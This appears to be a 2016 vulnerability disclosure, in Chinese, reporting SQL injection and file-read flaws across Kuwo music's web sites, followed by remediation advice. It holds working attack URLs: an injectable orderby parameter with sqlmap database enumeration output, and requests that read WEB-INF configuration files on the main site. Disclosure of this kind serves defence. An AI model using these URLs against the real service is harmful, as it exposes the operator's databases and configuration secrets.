漏洞标题 酷我的主站和10多个子站SQL注入+文件读取 相关制造商 kuwo音乐 漏洞作者 熊猫 提交时间 2016-06-21 16: 06 公共时间 2016-06-27 09: 39 漏洞类型 SQL注入漏洞 危险等级 高 自我评估等级 15 漏洞状态 该漏洞已通知供应商,但供应商忽略了该漏洞 标签标签 漏洞详细信息 漏洞网站统计信息: http://yule.kuwo.cn/ http://kappa.kuwo.cn/ http://huodong.kuwo.cn/ http://album.kuwo.cn/ http://playlist.kuwo.cn/ http://play.kuwo.cn/ http://changba.kuwo.cn/ http://www.kuwo.cn/ http://tupian.kuwo.cn/ http://hbtv.kuwo.cn/ http://gxtv.kuwo.cn/ http://yinyue.kuwo.cn/ 目前,连接上述主站的12个站点受到影响,可能存在遗漏。 A. SQL注入: http://www.kuwo.cn/huodong/wanmei/xianglong/getAllWork?orderby=flowers&huodongName=wanmeixianglong&curpager=1 漏洞参数: orderby SQLMAP可以运行数据:
涉及21个数据库: 可用数据库[21]: [*] ACT [*]贝尔 [*]咖啡厅 [*] CONCERT [*] CROWD_FUNDING [*] information_schema [*] KGE [*] KGE_ACT [*] KGECOMMENT [*] KW_TV [*] LISTEN_STORY [*] MANYOU [*] mysql [*]新闻 [*] performance_schema [*] RESWIKI [*]发言人 [*]统计 [*] TAOBAO [*]测试 [*]雅虎 其余站点可以使用sqlmap运行数据,相同的漏洞点,使用SQLMAP证书:
漏洞证明: 其次,读取文件 这是一个历史问题。以前曾提交过白帽,但制造商一直在修复。 主要网站: http://www.kuwo.cn/huodong/st/ActCommentsNewFromDB?dis=/WEB-INF/web.xml?&pn=0&subid=142
http://www.kuwo.cn/huodong/st/ActCommentsNewFromDB?dis=/WEB-INF/classes/config.properties?&pn=0&subid=142
http://www.kuwo.cn/huodong/st/ActCommentsNewFromDB?dis=/WEB-INF/classes/log4j.properties?&pn=0&subid=142
同样,其他子站点也存在文件读取漏洞,供应商仍在尝试修复它们。 修理计划: 1. SQL注入:对orderby参数进行严格的顺序过滤; 2.文件读取:组合此功能点以确定是否跨目录读取文件。或者使用一种愚蠢的方式来判断诸如./,WEB-INF,jsp $(jsp end)之类的文件是不可读的。 版权声明:请注明源熊猫@乌云